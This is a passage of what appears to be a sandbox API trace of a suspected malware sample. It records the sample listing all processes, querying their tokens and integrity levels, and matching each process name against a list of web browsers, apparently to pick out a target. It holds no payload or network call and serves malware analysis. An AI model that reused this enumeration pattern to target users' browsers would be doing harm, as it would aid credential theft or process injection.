dwSize=0xbc50, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0315.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbc50, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0315.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0315.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x444 [0315.256] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.256] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.256] GetLastError () returned 0x7a [0315.256] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d0c8, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d0c8, ReturnLength=0x275fc44) returned 1 [0315.256] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.256] CloseHandle (hObject=0x5b0) returned 1 [0315.256] CloseHandle (hObject=0x444) returned 1 [0315.257] GetLengthSid (pSid=0x235d0d0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x444 [0315.257] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x275fbd2, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.257] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.257] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.257] GetLastError () returned 0x7a [0315.257] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350bc8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350bc8, ReturnLength=0x275fc70) returned 1 [0315.257] GetSidSubAuthorityCount (pSid=0x2350bd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350bd1 [0315.257] GetSidSubAuthority (pSid=0x2350bd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350bd8 [0315.257] CloseHandle (hObject=0x5b0) returned 1 [0315.257] CloseHandle (hObject=0x444) returned 1 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8d0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8d0, cbMultiByte=11, lpWideCharStr=0x235d7a0, cchWideChar=12 | out: lpWideCharStr="firefox.exe") returned 11 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8e8, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8e8, cbMultiByte=10, lpWideCharStr=0x235d7c8, cchWideChar=11 | out: lpWideCharStr="chrome.exe") returned 10 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e900, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0315.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e900, cbMultiByte=9, lpWideCharStr=0x2350c28, cchWideChar=10 | out: lpWideCharStr="opera.exe") returned 9 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350c68, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350c68, cbMultiByte=12, lpWideCharStr=0x235d7f0, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 12 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350ca8, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350ca8, cbMultiByte=17, lpWideCharStr=0x235d0c8, cchWideChar=18 | out: lpWideCharStr="MicrosoftEdge.exe") returned 17 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350ce8, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0315.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2350ce8, cbMultiByte=19, lpWideCharStr=0x235d0f8, cchWideChar=20 | out: lpWideCharStr="MicrosoftEdgeCP.exe") returned 19 [0315.258] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0315.258] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0315.258] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0315.258] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0315.258] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0315.258] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0315.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0315.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x444 [0315.258] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.258] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.258] GetLastError () returned 0x7a [0315.258] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.258] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.258] CloseHandle (hObject=0x5b0) returned 1 [0315.258] CloseHandle (hObject=0x444) returned 1 [0315.258] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x444 [0315.258] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x246960, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.258] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.258] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.258] GetLastError () returned 0x7a [0315.258] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.258] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.258] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.258] CloseHandle (hObject=0x5b0) returned 1 [0315.258] CloseHandle (hObject=0x444) returned 1 [0315.259] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0315.259] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0315.259] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0315.259] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0315.259] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0315.259] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0315.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x444 [0315.259] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.259] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.259] GetLastError () returned 0x7a [0315.259] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.259] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.259] CloseHandle (hObject=0x5b0) returned 1 [0315.259] CloseHandle (hObject=0x444) returned 1 [0315.259] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x444 [0315.259] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x246fe0, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.259] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.259] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.259] GetLastError () returned 0x7a [0315.259] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.259] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.259] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.259] CloseHandle (hObject=0x5b0) returned 1 [0315.259] CloseHandle (hObject=0x444) returned 1 [0315.259] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0315.259] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0315.259] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0315.259] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0315.259] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0315.259] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0315.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x444 [0315.260] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.260] GetLastError () returned 0x7a [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.260] CloseHandle (hObject=0x5b0) returned 1 [0315.260] CloseHandle (hObject=0x444) returned 1 [0315.260] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x444 [0315.260] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247178, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.260] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.260] GetLastError () returned 0x7a [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.260] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.260] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.260] CloseHandle (hObject=0x5b0) returned 1 [0315.260] CloseHandle (hObject=0x444) returned 1 [0315.260] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0315.260] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0315.260] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0315.260] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0315.260] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0315.260] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0315.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0315.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x444 [0315.260] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.260] GetLastError () returned 0x7a [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.260] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.260] CloseHandle (hObject=0x5b0) returned 1 [0315.260] CloseHandle (hObject=0x444) returned 1 [0315.260] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x444 [0315.261] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247a80, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.261] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.261] GetLastError () returned 0x7a [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.261] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.261] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.261] CloseHandle (hObject=0x5b0) returned 1 [0315.261] CloseHandle (hObject=0x444) returned 1 [0315.261] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.261] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.261] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0315.261] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.261] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.261] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x444 [0315.261] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.261] GetLastError () returned 0x7a [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.261] CloseHandle (hObject=0x5b0) returned 1 [0315.261] CloseHandle (hObject=0x444) returned 1 [0315.261] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x444 [0315.261] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247e28, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.261] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.261] GetLastError () returned 0x7a [0315.261] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.261] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.261] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.261] CloseHandle (hObject=0x5b0) returned 1 [0315.261] CloseHandle (hObject=0x444) returned 1 [0315.262] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0315.262] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0315.262] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0315.262] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0315.262] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0315.262] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0315.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x444 [0315.262] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x5b0) returned 1 [0315.262] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0315.262] GetLastError () returned 0x7a [0315.262] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: 